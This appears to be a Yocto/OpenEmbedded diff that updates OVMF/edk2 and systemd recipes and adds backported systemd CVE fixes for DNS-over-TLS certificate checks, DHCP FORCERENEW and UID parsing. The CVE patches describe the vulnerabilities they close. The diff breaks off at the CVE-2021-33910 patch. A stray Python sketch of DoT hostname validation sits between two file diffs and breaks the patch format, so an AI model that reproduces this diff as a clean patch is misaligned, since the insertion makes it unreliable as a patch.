INCLUDE = $(TOOL_INCLUDE) -I $(MAKEROOT) -I $(MAKEROOT)/Include/Common -I $(MAKEROOT)/Include/ -I $(MAKEROOT)/Include/IndustryStandard -I $(MAKEROOT)/Common/ -I .. -I . $(ARCH_INCLUDE)
@@ -33,19 +33,35 @@ index 4e9b36d98b..eb03ee33fa 100644
+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -Wall -Werror \
-Wno-deprecated-declarations -Wno-self-assign -Wno-unused-result -nostdlib -g
else
+ ifeq ($(CXX), llvm)
+-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
++BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
+ -fno-delete-null-pointer-checks -Wall -Werror \
+ -Wno-deprecated-declarations -Wno-self-assign \
+ -Wno-unused-result -nostdlib -g
+ else
-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
-fno-delete-null-pointer-checks -Wall -Werror \
-Wno-deprecated-declarations -Wno-stringop-truncation -Wno-restrict \
-Wno-unused-result -nostdlib -g
endif
+ endif
+ ifeq ($(CXX), llvm)
+-BUILD_LFLAGS =
+-BUILD_CXXFLAGS = -Wno-deprecated-register -Wno-unused-result
++BUILD_LFLAGS = $(LDFLAGS)
++BUILD_CXXFLAGS += -Wno-deprecated-register -Wno-unused-result
+ else
-BUILD_LFLAGS =
-BUILD_CXXFLAGS = -Wno-unused-result
+BUILD_LFLAGS = $(LDFLAGS)
+BUILD_CXXFLAGS += -Wno-unused-result
-
+ endif
++
ifeq ($(HOST_ARCH), IA32)
#
+ # Snow Leopard is a 32-bit and 64-bit environment. uname -m returns i386, but gcc defaults
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
index ab1e7db31f..df1d159011 100644
--- a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
+++ b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
@@ -1,7 +1,7 @@
-From 60a5f953f747e1e9e05a40157b651cba8ea57b91 Mon Sep 17 00:00:00 2001
+From e19481e5a64f8915ac118899b10c40d12c0f9daa Mon Sep 17 00:00:00 2001
From: Dengke Du <dengke.du@windriver.com>
Date: Mon, 11 Sep 2017 02:21:55 -0400
-Subject: [PATCH 3/5] ovmf: enable long path file
+Subject: [PATCH 3/4] ovmf: enable long path file
Upstream-Status: Pending
Signed-off-by: Dengke Du <dengke.du@windriver.com>
@@ -24,5 +24,5 @@ index e1cce985f7..d67d03c70c 100644
#define MAX_UINT64 ((UINT64)0xFFFFFFFFFFFFFFFFULL)
#define MAX_UINT32 ((UINT32)0xFFFFFFFF)
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
index c10a39d95d..128438b201 100644
--- a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
+++ b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
@@ -1,7 +1,7 @@
-From 94eff316b31b4d0348af28c77be5c00bc09fe8e7 Mon Sep 17 00:00:00 2001
+From ad06fcf1e08736e79221cd6863ff2e3c9254f261 Mon Sep 17 00:00:00 2001
From: Steve Langasek <steve.langasek@ubuntu.com>
Date: Sat, 10 Jun 2017 01:39:36 -0700
-Subject: [PATCH 4/5] ovmf: Update to latest
+Subject: [PATCH 4/4] ovmf: Update to latest
Description: pass -fno-stack-protector to all GCC toolchains
The upstream build rules inexplicably pass -fno-stack-protector only
@@ -15,15 +15,15 @@ Upstream-Status: Pending
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/BaseTools/Conf/tools_def.template b/BaseTools/Conf/tools_def.template
-index ca0b122dbb..b0066c2ab8 100755
+index 933b3160fd..c2fbbf0c38 100755
--- a/BaseTools/Conf/tools_def.template
+++ b/BaseTools/Conf/tools_def.template
-@@ -1941,10 +1941,10 @@ DEFINE GCC_X64_RC_FLAGS = -I binary -O elf64-x86-64 -B i386
- DEFINE GCC_ARM_RC_FLAGS = -I binary -O elf32-littlearm -B arm --rename-section .data=.hii
- DEFINE GCC_AARCH64_RC_FLAGS = -I binary -O elf64-littleaarch64 -B aarch64 --rename-section .data=.hii
+@@ -1952,10 +1952,10 @@ DEFINE GCC_RISCV64_RC_FLAGS = -I binary -O elf64-littleriscv -B riscv
+ # GCC Build Flag for included header file list generation
+ DEFINE GCC_DEPS_FLAGS = -MMD -MF $@.deps
--DEFINE GCC48_ALL_CC_FLAGS = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
-+DEFINE GCC48_ALL_CC_FLAGS = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -fno-stack-protector -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
+-DEFINE GCC48_ALL_CC_FLAGS = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
++DEFINE GCC48_ALL_CC_FLAGS = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -fno-stack-protector -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
DEFINE GCC48_IA32_X64_DLINK_COMMON = -nostdlib -Wl,-n,-q,--gc-sections -z common-page-size=0x20
-DEFINE GCC48_IA32_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m32 -march=i586 -malign-double -fno-stack-protector -D EFI32 -fno-asynchronous-unwind-tables -Wno-address
-DEFINE GCC48_X64_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m64 -fno-stack-protector "-DEFIAPI=__attribute__((ms_abi))" -maccumulate-outgoing-args -mno-red-zone -Wno-address -mcmodel=small -fpie -fno-asynchronous-unwind-tables -Wno-address
@@ -32,7 +32,7 @@ index ca0b122dbb..b0066c2ab8 100755
DEFINE GCC48_IA32_X64_ASLDLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,ReferenceAcpiTable -u ReferenceAcpiTable
DEFINE GCC48_IA32_X64_DLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,$(IMAGE_ENTRY_POINT) -u $(IMAGE_ENTRY_POINT) -Wl,-Map,$(DEST_DIR_DEBUG)/$(BASE_NAME).map,--whole-archive
DEFINE GCC48_IA32_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x220 DEF(GCC_DLINK2_FLAGS_COMMON)
-@@ -1953,7 +1953,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF
+@@ -1964,7 +1964,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF
DEFINE GCC48_ASM_FLAGS = DEF(GCC_ASM_FLAGS)
DEFINE GCC48_ARM_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian
DEFINE GCC48_AARCH64_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian
@@ -42,5 +42,5 @@ index ca0b122dbb..b0066c2ab8 100755
DEFINE GCC48_AARCH64_CC_FLAGS = $(ARCHCC_FLAGS) $(PLATFORM_FLAGS) -mcmodel=large DEF(GCC_AARCH64_CC_FLAGS)
DEFINE GCC48_AARCH64_CC_XIPFLAGS = DEF(GCC_AARCH64_CC_XIPFLAGS)
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf_git.bb b/meta/recipes-core/ovmf/ovmf_git.bb
index 9667fa0c86..a487f77e3c 100644
--- a/meta/recipes-core/ovmf/ovmf_git.bb
+++ b/meta/recipes-core/ovmf/ovmf_git.bb
@@ -12,15 +12,19 @@ LIC_FILES_CHKSUM = "file://OvmfPkg/License.txt;md5=06357ddc23f46577c2aeaeaf7b776
PACKAGECONFIG ??= ""
PACKAGECONFIG[secureboot] = ",,,"
-SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=git \
+SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=https \
file://0001-ovmf-update-path-to-native-BaseTools.patch \
file://0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch \
file://0003-ovmf-enable-long-path-file.patch \
file://0004-ovmf-Update-to-latest.patch \
- "
-
-PV = "edk2-stable201911"
-SRCREV = "bd85bf54c268204c7a698a96f3ccd96cd77952cd"
+ file://0001-Fix-VLA-parameter-warning.patch \
+ file://0001-Basetools-genffs-fix-gcc12-warning.patch \
+ file://0001-Basetools-lzmaenc-fix-gcc12-warning.patch \
+ file://0001-Basetools-turn-off-gcc12-warning.patch \
+ "
+
+PV = "edk2-stable202008"
+SRCREV = "06dc822d045c2bb42e497487935485302486e151"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>edk2-stable.*)"
inherit deploy
@@ -37,7 +41,7 @@ EDK_TOOLS_DIR="edk2_basetools"
BUILD_OPTIMIZATION="-pipe"
# OVMF supports IA only, although it could conceivably support ARM someday.
-COMPATIBLE_HOST='(i.86|x86_64).*'
+COMPATIBLE_HOST_class-target='(i.86|x86_64).*'
# Additional build flags for OVMF with Secure Boot.
# Fedora also uses "-D SMM_REQUIRE -D EXCLUDE_SHELL_FROM_FD".
diff --git a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
index 5ec3f6c927..5523f874db 100644
--- a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
+++ b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
@@ -4,3 +4,4 @@ PR = "r1"
inherit packagegroup
RDEPENDS_${PN} = "dropbear"
+RRECOMMENDS_${PN} = "openssh-sftp-server"
diff --git a/meta/recipes-core/psplash/files/psplash-start.service b/meta/recipes-core/psplash/files/psplash-start.service
index 36c2bb38e0..bec9368427 100644
--- a/meta/recipes-core/psplash/files/psplash-start.service
+++ b/meta/recipes-core/psplash/files/psplash-start.service
@@ -2,6 +2,7 @@
Description=Start psplash boot splash screen
DefaultDependencies=no
RequiresMountsFor=/run
+ConditionFileIsExecutable=/usr/bin/psplash
[Service]
Type=notify
diff --git a/meta/recipes-core/psplash/files/psplash-systemd.service b/meta/recipes-core/psplash/files/psplash-systemd.service
index 082207f232..e93e3deb35 100644
--- a/meta/recipes-core/psplash/files/psplash-systemd.service
+++ b/meta/recipes-core/psplash/files/psplash-systemd.service
@@ -4,6 +4,7 @@ DefaultDependencies=no
After=psplash-start.service
Requires=psplash-start.service
RequiresMountsFor=/run
+ConditionFileIsExecutable=/usr/bin/psplash
[Service]
ExecStart=/usr/bin/psplash-systemd
diff --git a/meta/recipes-core/psplash/psplash_git.bb b/meta/recipes-core/psplash/psplash_git.bb
index 22c71f099b..b2947c2114 100644
--- a/meta/recipes-core/psplash/psplash_git.bb
+++ b/meta/recipes-core/psplash/psplash_git.bb
@@ -10,7 +10,7 @@ SRCREV = "0a902f7cd875ccf018456451be369f05fa55f962"
PV = "0.1+git${SRCPV}"
PR = "r15"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
file://psplash-init \
file://psplash-start.service \
file://psplash-systemd.service \
diff --git a/meta/recipes-core/systemd/systemd-boot_244.3.bb b/meta/recipes-core/systemd/systemd-boot_244.5.bb
index f92c639810..f92c639810 100644
--- a/meta/recipes-core/systemd/systemd-boot_244.3.bb
+++ b/meta/recipes-core/systemd/systemd-boot_244.5.bb
diff --git a/meta/recipes-core/systemd/systemd-conf/wired.network b/meta/recipes-core/systemd/systemd-conf/wired.network
index ff807ba31f..34c20fcb24 100644
--- a/meta/recipes-core/systemd/systemd-conf/wired.network
+++ b/meta/recipes-core/systemd/systemd-conf/wired.network
@@ -1,6 +1,7 @@
[Match]
Name=en* eth*
KernelCommandLine=!nfsroot
+KernelCommandLine=!ip
[Network]
DHCP=yes
diff --git a/meta/recipes-core/systemd/systemd-conf_244.3.bb b/meta/recipes-core/systemd/systemd-conf_244.3.bb
index d9ec023bfd..9b797a91f4 100644
--- a/meta/recipes-core/systemd/systemd-conf_244.3.bb
+++ b/meta/recipes-core/systemd/systemd-conf_244.3.bb
@@ -23,9 +23,6 @@ do_install() {
# Based on change from YP bug 8141, OE commit 5196d7bacaef1076c361adaa2867be31759c1b52
do_install_append_qemuall() {
install -D -m0644 ${WORKDIR}/system.conf-qemuall ${D}${systemd_unitdir}/system.conf.d/01-${PN}.conf
-
- # Do not install wired.network for qemu bsps
- rm -rf ${D}${systemd_unitdir}/network
}
PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-core/systemd/systemd-systemctl/systemctl b/meta/recipes-core/systemd/systemd-systemctl/systemctl
index 990de1ab39..e003c860e3 100755
--- a/meta/recipes-core/systemd/systemd-systemctl/systemctl
+++ b/meta/recipes-core/systemd/systemd-systemctl/systemctl
@@ -11,6 +11,7 @@ import re
import sys
from collections import namedtuple
+from itertools import chain
from pathlib import Path
version = 1.0
@@ -25,12 +26,16 @@ locations = list()
class SystemdFile():
"""Class representing a single systemd configuration file"""
- def __init__(self, root, path):
+ def __init__(self, root, path, instance_unit_name):
self.sections = dict()
self._parse(root, path)
dirname = os.path.basename(path.name) + ".d"
for location in locations:
- for path2 in sorted((root / location / "system" / dirname).glob("*.conf")):
+ files = (root / location / "system" / dirname).glob("*.conf")
+ if instance_unit_name:
+ inst_dirname = instance_unit_name + ".d"
+ files = chain(files, (root / location / "system" / inst_dirname).glob("*.conf"))
+ for path2 in sorted(files):
self._parse(root, path2)
def _parse(self, root, path):
@@ -177,12 +182,14 @@ class SystemdUnit():
raise SystemdUnitNotFoundError(self.root, unit)
- def _process_deps(self, config, service, location, prop, dirstem):
+ def _process_deps(self, config, service, location, prop, dirstem, instance):
systemdir = self.root / SYSCONFDIR / "systemd" / "system"
target = ROOT / location.relative_to(self.root)
try:
for dependent in config.get('Install', prop):
+ # expand any %i to instance (ignoring escape sequence %%)
+ dependent = re.sub("([^%](%%)*)%i", "\\g<1>{}".format(instance), dependent)
wants = systemdir / "{}.{}".format(dependent, dirstem) / service
add_link(wants, target)
@@ -193,8 +200,11 @@ class SystemdUnit():
# if we're enabling an instance, first extract the actual instance
# then figure out what the template unit is
template = re.match(r"[^@]+@(?P<instance>[^\.]*)\.", self.unit)
+ instance_unit_name = None
if template:
instance = template.group('instance')
+ if instance != "":
+ instance_unit_name = self.unit
unit = re.sub(r"@[^\.]*\.", "@.", self.unit, 1)
else:
instance = None
@@ -206,7 +216,7 @@ class SystemdUnit():
# ignore aliases
return
- config = SystemdFile(self.root, path)
+ config = SystemdFile(self.root, path, instance_unit_name)
if instance == "":
try:
default_instance = config.get('Install', 'DefaultInstance')[0]
@@ -219,8 +229,8 @@ class SystemdUnit():
else:
service = self.unit
- self._process_deps(config, service, path, 'WantedBy', 'wants')
- self._process_deps(config, service, path, 'RequiredBy', 'requires')
+ self._process_deps(config, service, path, 'WantedBy', 'wants', instance)
+ self._process_deps(config, service, path, 'RequiredBy', 'requires', instance)
try:
for also in config.get('Install', 'Also'):
diff --git a/meta/recipes-core/systemd/systemd.inc b/meta/recipes-core/systemd/systemd.inc
index e73b397b5d..8b5260bb0d 100644
--- a/meta/recipes-core/systemd/systemd.inc
+++ b/meta/recipes-core/systemd/systemd.inc
@@ -14,8 +14,8 @@ LICENSE = "GPLv2 & LGPLv2.1"
LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \
file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c"
-SRCREV = "b7ed902b2394f94e7f1fbe6c3194b5cd9a9429e6"
+SRCREV = "3ceaa81c61b654ebf562464d142675bd4d57d7b6"
SRCBRANCH = "v244-stable"
-SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/systemd/systemd/00-create-volatile.conf b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
index 87cbe1e7d3..c4277221a2 100644
--- a/meta/recipes-core/systemd/systemd/00-create-volatile.conf
+++ b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
@@ -3,5 +3,6 @@
# inside /var/log.
+d /run/lock 1777 - - -
d /var/volatile/log - - - -
d /var/volatile/tmp 1777 - -
diff --git a/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
new file mode 100644
index 0000000000..8d3801a248
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
@@ -0,0 +1,120 @@
+From 3f9d9289ee8730a81a0464539f4e1ba2d23d0ce9 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 3 Mar 2020 23:31:25 +0000
+Subject: [PATCH] systemd-resolved: use hostname for certificate validation in
+ DoT
+
+Widely accepted certificates for IP addresses are expensive and only
+affordable for larger organizations. Therefore if the user provides
+the hostname in the DNS= option, we should use it instead of the IP
+address.
+
+(cherry picked from commit eec394f10bbfcc3d2fc8504ad8ff5be44231abd5)
+
+CVE: CVE-2018-21029
+Upstream-Status: Backport [ff26d281aec0877b43269f18c6282cd79a7f5529]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ man/resolved.conf.xml | 16 +++++++++++-----
+ src/resolve/resolved-dnstls-gnutls.c | 20 ++++++++++++--------
+ src/resolve/resolved-dnstls-openssl.c | 15 +++++++++++----
+ 3 files changed, 34 insertions(+), 17 deletions(-)
+
+diff --git a/man/resolved.conf.xml b/man/resolved.conf.xml
+index 818000145b..37161ebcbc 100644
+--- a/man/resolved.conf.xml
++++ b/man/resolved.conf.xml
+@@ -193,11 +193,17 @@
+ <varlistentry>
+ <term><varname>DNSOverTLS=</varname></term>
+ <listitem>
+- <para>Takes a boolean argument or <literal>opportunistic</literal>.
+- If true all connections to the server will be encrypted. Note that
+- this mode requires a DNS server that supports DNS-over-TLS and has
+- a valid certificate for it's IP. If the DNS server does not support
+- DNS-over-TLS all DNS requests will fail. When set to <literal>opportunistic</literal>
++ <para>Takes a boolean argument or <literal>opportunistic</literal>. If
++ true all connections to the server will be encrypted. Note that this
++ mode requires a DNS server that supports DNS-over-TLS and has a valid
++ certificate. If the hostname was specified in <varname>DNS=</varname>
+ by using the format <literal>address#server_name</literal> it
++ is used to validate its certificate and also to enable Server Name
++ Indication (SNI) when opening a TLS connection. Otherwise
++ the certificate is checked against the server's IP.
++ If the DNS server does not support DNS-over-TLS all DNS requests will fail.</para>
++
++ <para>When set to <literal>opportunistic</literal>
+ DNS request are attempted to send encrypted with DNS-over-TLS.
+ If the DNS server does not support TLS, DNS-over-TLS is disabled.
+ Note that this mode makes DNS-over-TLS vulnerable to "downgrade"
+diff --git a/src/resolve/resolved-dnstls-gnutls.c b/src/resolve/resolved-dnstls-gnutls.c
+index ed0a31e8bf..c7215723a7 100644
+--- a/src/resolve/resolved-dnstls-gnutls.c
++++ b/src/resolve/resolved-dnstls-gnutls.c
+@@ -56,15 +56,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
+ }
+
+ if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
+- stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
+- if (server->family == AF_INET) {
+- stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
+- stream->dnstls_data.validation.size = 4;
+- } else {
+- stream->dnstls_data.validation.data = server->address.in6.s6_addr;
+- stream->dnstls_data.validation.size = 16;
++ if (server->server_name)
++ gnutls_session_set_verify_cert(gs, server->server_name, 0);
++ else {
++ stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
++ if (server->family == AF_INET) {
++ stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
++ stream->dnstls_data.validation.size = 4;
++ } else {
++ stream->dnstls_data.validation.data = server->address.in6.s6_addr;
++ stream->dnstls_data.validation.size = 16;
++ }
++ gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
+ }
+- gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
+ }
+
+ gnutls_handshake_set_timeout(gs, GNUTLS_DEFAULT_HANDSHAKE_TIMEOUT);
+diff --git a/src/resolve/resolved-dnstls-openssl.c b/src/resolve/resolved-dnstls-openssl.c
+index 85e202ff74..007aedaa5b 100644
+--- a/src/resolve/resolved-dnstls-openssl.c
++++ b/src/resolve/resolved-dnstls-openssl.c
+@@ -6,6 +6,7 @@
+
+ #include <openssl/bio.h>
+ #include <openssl/err.h>
++#include <openssl/x509v3.h>
+
+ #include "io-util.h"
+ #include "resolved-dns-stream.h"
+@@ -78,13 +79,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
+
+ if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
+ X509_VERIFY_PARAM *v;
+- const unsigned char *ip;
+
+ SSL_set_verify(s, SSL_VERIFY_PEER, NULL);
+ v = SSL_get0_param(s);
+- ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
+- if (!X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)))
+- return -ECONNREFUSED;
++ if (server->server_name) {
++ X509_VERIFY_PARAM_set_hostflags(v, X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS);
++ if (X509_VERIFY_PARAM_set1_host(v, server->server_name, 0) == 0)
++ return -ECONNREFUSED;
++ } else {
++ const unsigned char *ip;
++ ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
++ if (X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)) == 0)
++ return -ECONNREFUSED;
++ }
+ }
+
+ ERR_clear_error();
+--
+2.40.1
+
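The idea behind the backport above, validating the certificate against a configured server name rather than the IP address, can be sketched with Python's ssl module; the dot_connect() helper and the Quad9 endpoint are illustrative assumptions, not part of systemd:

import socket, ssl

def dot_connect(address, server_name=None):
    # With DNS=address#server_name the certificate is verified against the
    # name (and the name is sent as SNI); otherwise fall back to checking
    # the certificate against the IP address itself.
    ctx = ssl.create_default_context()
    sock = socket.create_connection((address, 853))  # DNS-over-TLS port
    return ctx.wrap_socket(sock, server_hostname=server_name or address)

# dot_connect("9.9.9.9", "dns.quad9.net")  -> hostname-based validation plus SNI
# dot_connect("9.9.9.9")                   -> certificate must cover the IP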
diff --git a/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
new file mode 100644
index 0000000000..6b499efbd8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
@@ -0,0 +1,42 @@
+From 38e980a6a5a3442c2f48b1f827284388096d8ca5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 24 Jun 2021 01:22:07 +0900
+Subject: [PATCH] sd-dhcp-client: tentatively ignore FORCERENEW command
+
+This makes DHCP client ignore FORCERENEW requests, as unauthenticated
+FORCERENEW requests cause a security issue (TALOS-2020-1142, CVE-2020-13529).
+
+Let's re-enable this after RFC3118 (Authentication for DHCP Messages)
+and/or RFC6704 (Forcerenew Nonce Authentication) are implemented.
+
+Fixes #16774.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/38e980a6a5a3442c2f48b1f827284388096d8ca5]
+CVE: CVE-2020-13529
+
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/libsystemd-network/sd-dhcp-client.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/src/libsystemd-network/sd-dhcp-client.c
++++ b/src/libsystemd-network/sd-dhcp-client.c
+@@ -1392,9 +1392,17 @@ static int client_handle_forcerenew(sd_dhcp_client *client, DHCPMessage *force,
+ if (r != DHCP_FORCERENEW)
+ return -ENOMSG;
+
++#if 0
+ log_dhcp_client(client, "FORCERENEW");
+
+ return 0;
++#else
++ /* FIXME: Ignore FORCERENEW requests until we implement RFC3118 (Authentication for DHCP
++ * Messages) and/or RFC6704 (Forcerenew Nonce Authentication), as unauthenticated FORCERENEW
++ * requests causes a security issue (TALOS-2020-1142, CVE-2020-13529). */
++ log_dhcp_client(client, "Received FORCERENEW, ignoring.");
++ return -ENOMSG;
++#endif
+ }
+
+ static bool lease_equal(const sd_dhcp_lease *a, const sd_dhcp_lease *b) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch b/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch
deleted file mode 100644
index 7b5e3e7f7a..0000000000
--- a/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch
+++ /dev/null
@@ -1,96 +0,0 @@
-From 156a5fd297b61bce31630d7a52c15614bf784843 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
-Date: Sun, 31 May 2020 18:21:09 +0200
-Subject: [PATCH 1/1] basic/user-util: always use base 10 for user/group
- numbers
-
-We would parse numbers with base prefixes as user identifiers. For example,
-"0x2b3bfa0" would be interpreted as UID==45334432 and "01750" would be
-interpreted as UID==1000. This parsing was used also in cases where either a
-user/group name or number may be specified. This means that names like
-0x2b3bfa0 would be ambiguous: they are a valid user name according to our
-documented relaxed rules, but they would also be parsed as numeric uids.
-
-This behaviour is definitely not expected by users, since tools generally only
-accept decimal numbers (e.g. id, getent passwd), while other tools only accept
-user names and thus will interpret such strings as user names without even
-attempting to convert them to numbers (su, ssh). So let's follow suit and only
-accept numbers in decimal notation. Effectively this means that we will reject
-such strings as a username/uid/groupname/gid where strict mode is used, and try
-to look up a user/group with such a name in relaxed mode.
-
-Since the function changed is fairly low-level and fairly widely used, this
-affects multiple tools: loginctl show-user/enable-linger/disable-linger foo',
-the third argument in sysusers.d, fourth and fifth arguments in tmpfiles.d,
-etc.
-
-Fixes #15985.
----
- src/basic/user-util.c | 2 +-
- src/test/test-user-util.c | 10 ++++++++++
- 2 files changed, 11 insertions(+), 1 deletion(-)
-
---- end of commit 156a5fd297b61bce31630d7a52c15614bf784843 ---
-
-
-Add definition of safe_atou32_full() from commit b934ac3d6e7dcad114776ef30ee9098693e7ab7e
-
-CVE: CVE-2020-13776
-
-Upstream-Status: Backport [https://github.com/systemd/systemd.git]
-
-Signed-off-by: Joe Slater <joe.slater@windriver.com>
-
-
-
---- git.orig/src/basic/user-util.c
-+++ git/src/basic/user-util.c
-@@ -49,7 +49,7 @@ int parse_uid(const char *s, uid_t *ret)
- assert(s);
-
- assert_cc(sizeof(uid_t) == sizeof(uint32_t));
-- r = safe_atou32(s, &uid);
-+ r = safe_atou32_full(s, 10, &uid);
- if (r < 0)
- return r;
-
---- git.orig/src/test/test-user-util.c
-+++ git/src/test/test-user-util.c
-@@ -48,9 +48,19 @@ static void test_parse_uid(void) {
-
- r = parse_uid("65535", &uid);
- assert_se(r == -ENXIO);
-+ assert_se(uid == 100);
-+
-+ r = parse_uid("0x1234", &uid);
-+ assert_se(r == -EINVAL);
-+ assert_se(uid == 100);
-+
-+ r = parse_uid("01234", &uid);
-+ assert_se(r == 0);
-+ assert_se(uid == 1234);
-
- r = parse_uid("asdsdas", &uid);
- assert_se(r == -EINVAL);
-+ assert_se(uid == 1234);
- }
-
- static void test_uid_ptr(void) {
---- git.orig/src/basic/parse-util.h
-+++ git/src/basic/parse-util.h
-@@ -45,9 +45,13 @@ static inline int safe_atoux16(const cha
-
- int safe_atoi16(const char *s, int16_t *ret);
-
--static inline int safe_atou32(const char *s, uint32_t *ret_u) {
-+static inline int safe_atou32_full(const char *s, unsigned base, uint32_t *ret_u) {
- assert_cc(sizeof(uint32_t) == sizeof(unsigned));
-- return safe_atou(s, (unsigned*) ret_u);
-+ return safe_atou_full(s, base, (unsigned*) ret_u);
-+}
-+
-+static inline int safe_atou32(const char *s, uint32_t *ret_u) {
-+ return safe_atou32_full(s, 0, (unsigned*) ret_u);
- }
-
- static inline int safe_atoi32(const char *s, int32_t *ret_i) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
new file mode 100644
index 0000000000..e92d721d3d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
@@ -0,0 +1,67 @@
+Backport of:
+
+From 441e0115646d54f080e5c3bb0ba477c892861ab9 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 23 Jun 2021 11:46:41 +0200
+Subject: [PATCH 1/2] basic/unit-name: do not use strdupa() on a path
+
